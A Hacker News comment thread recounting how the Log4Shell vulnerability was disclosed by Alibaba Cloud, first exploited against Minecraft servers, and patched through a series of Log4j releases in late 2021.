Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

> Alibaba group were the ones that disclosed the log4shell vulnerability which always surprised me

Really? My memory of the event was that the news broke in Minecraft servers [0] before it was expanded to all Java apps that used log4j.

[0]: https://arstechnica.com/information-technology/2021/12/the-l...



https://en.wikipedia.org/wiki/Log4Shell

> The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021. Before an official CVE identifier was made available on December 10th, 2021.

your Link dated 12/13/2021 says:

> Log4Shell is the name given to a critical zero-day vulnerability that surfaced on Thursday when it was exploited in the wild in remote-code compromises against Minecraft servers.

Which would have been around the 9th of Dec.


Yeah and they failed to report to China's MIIT within the time window... https://www.wsj.com/articles/china-halts-alibaba-cybersecuri...

(To be clear the obligation is not they have to report to Chinese government first. They just totally forgot to tell the government agency for coordinating these kind of security incident cross companies)


TBF at least half of the firms did't give a fuck to the specific regulation at that time, and given the rumor that the bug is found when a Security Engineer (who works on product security instead of vulnerability research) decided to learn CodeQL I'm not surprised nobody on his report chain cared enough.

... and oh hi are you the same fancl20 on <that mostly-defunct Chinese Twitter-clone> some 15 years ago?


Yes I’m… hmmm you can contact me by my id at gmail if you want :)


It started here https://github.com/apache/logging-log4j2/pull/608#issuecomme... and was rapidly recognized that this impacted almost everything.

Minecraft servers were one of the most accessible places to use the exploit and at the same time, some of the ones that are least likely to patch updates rapidly.


As others pointed out that comment was after the cve was created.


The comment is, but the start of the PR (by a person from the Apache Foundation org) matches matches the "we told Apache" date.

The "all hell broke lose" starts with that comment.

Note that the LDAP part wasn't sufficient to fully excise the security vulnerability.


24th Nov reported by Alibaba and the 30th this conversation starts in response to the heads up right?


I believe the timeline is:

    Nov 24 - Wednesday - Report of issue
    Nov 25 - Thursday  - Thanksgiving
    Nov 29 - Monday    - Work done
    Nov 30 - Tuesday   - PR submitted
    (review as if nothing special)
    Dec  9 - Thursday  - "Is it a security vulnerability?"
    Dec 10 - Friday    - All hell breaks loose (Log4j 2.15.0 released)
    Dec 13 - Monday    - Java devs updating libraries furiously (Log4j 2.16.0 released)
    Dec 18 - Saturday  - Wait? there's more (Log4j 2.17.0 released)
    ...
    Dec 27 - Monday    - Enough already (Log4j 2.17.1 released)


It was the Alibaba group. They were even penalised by Chinese authorities for not following some protocol around disclosures.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: